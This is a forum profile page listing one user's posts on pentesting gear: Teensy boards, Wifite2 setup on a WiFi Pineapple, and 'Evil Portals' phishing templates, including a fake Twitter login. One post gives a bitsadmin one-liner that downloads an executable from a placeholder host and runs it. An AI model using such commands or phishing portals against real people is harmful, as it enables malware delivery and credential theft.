Jump to content

kleo

Active Members
  • Posts

    227
  • Joined

  • Last visited

  • Days Won

    8

Everything posted by kleo

  1. Since the Teensy 2.0++ uses a mini b port, you could use a male mini b - usb cable to usb male plug. I use these adapters for my Teensy 3.6 since they have a micro b port. Edit: @4l4k4z4m Technically you could do it but it would be too fiddly to solder wires to attach usb wires onto the board. I wouldn't recommend it unless you have a lot of Teensy boards lying around to mess with. This is how I ruined my older Teensy 2.0 board. You could follow this as a guide for replacing mini b to micro b https://www.youtube.com/watch?v=mOsBbEZ_1Lo Same goes if you want to solder wires directly.
  2. Meow https://github.com/kbeflo/teensy-payloads Btw I tested these payloads on a Teensy 3.6. Teensies only vary by their power tolerance, size, cost, and power. You should pick one that suits you best.
  3. Wifite2 WiFi Pineapple Setup Simple setup to use Wifite2 on your WiFi Pineapple. Credits to the contributors of Wifite2. Requirements: 1. Mounted flashdrive on the WiFi Pineapple. (We won't be using an sdcard due to a kernel bug, still present on the latest version 2.0.2, pointed out by Zylla, https://www.wifipineapple.com/bugs/511) 2. Flashdrive format script by Zylla: Mirror: https://gist.github.com/kbeflo/8c85c084e9c5ae86b3367716a463e793 3. Mount flashdrive on boot # Mount flashdrive on boot # create mount.sh at /root/ mount /dev/sdb1 /sd swapon /dev/sdb2 # include these lines at /etc/rc.local sleep 5 ./root/mount.sh Wifite2: Github: https://github.com/derv82/wifite2 opkg update # tetra opkg install git git-http coreutils-stty git clone git://github.com/derv82/wifite2.git cd wifite2/ ./Wifite.py # nano with sd card opkg install --dest sd git git-http coreutils-stty cd /sd/ git clone git://github.com/derv82/wifite2.git cd wifite2/ ./Wifite.py
  4. kleo

    Evil Portals

    @stilia.johny I don't think that's really necessary, you could use the Cabinet module to view the ep-logs.
  5. kleo

    Evil Portals

    Update New template, twttr-login
  6. You could use Bitsadmin. Download on the current directory bitsadmin /transfer "job" https://foo.com/bar.exe "%cd%\bar.exe" Download to specified directory bitsadmin /transfer "job" https://foo.com/bar.exe "C:\folder\bar.exe" Download and then execute cmd.exe /c "bitsadmin /transfer job https://foo.com/bar.exe C:\folder\bar.exe&start bar.exe"
  7. kleo

    P4wnP1

    Would recommend using N-O-D-E's Pi Zero case available open source for 3d printing, also available on his shop.
  8. you misspelled pineapple
  9. I don't think you really did. Any more would be spoon-feed. They were made for the Evil Portal module.
  10. Hey man, take a look at Evil Portals on my sig, it might just help you out.
  11. @BeNe this could help you out. https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/
  12. Another project that needs more attention is tholum's PiBunny for the Raspberry Pi Zero https://github.com/tholum/PiBunny
  13. Hey man, check out Evil Portals on my sig.
  14. @graceinc hey man, here you go https://www.reddit.com/r/raspberry_pi/comments/46ikup/duckberry_pi_keyboard_emulator_and_automator_on_a/
  15. kleo

    Evil Portals

    Update Included more info for using the cliqq-payload portal.
  16. kleo

    IRC server

    Hak5 irc can be found on irc.hak5.org, channel #hak5 Also available on freenode, chat.freenode.net, channel #hak5
  17. kleo

    Evil Portals

    Update Include cliqq-payload. Internal IP, MAC, and hostname logging.
  18. Connecting to the mgmt access point or even the any of the occupinapple broadcasted access points of the Pineapple could pretty much give access to the web interface. After connecting just go to 172.16.42.1:1471 or preset IP i.e 192.168.1.1:1471
  19. How about reset everything, and follow a step-by-step setup procedure for everything required for the OpenWrt SDK. We'll just follow through after that.
  20. Pineapple Nano recovery is conflicting with your Asus router with 192.168.1.1 IP address range, I suggest disconnecting from your Asus router first before continuing.
  21. Quick fix: Open wifite-ng file using your favorite text editor Go to line 183, and modify dir='/tmp/' to dir='/sd/tmp/' After that create tmp folder on your sd card, mkdir /sd/tmp I apologize for the neglect on this issue. Made the fix on the install script, just rerun the setup again.
  22. Got it. This was compiled from the github link I gave right? Thanks again Zylla.
  23. Thanks! @Zylla but I'm getting error 429 from dropbox.
×
×
  • Create New...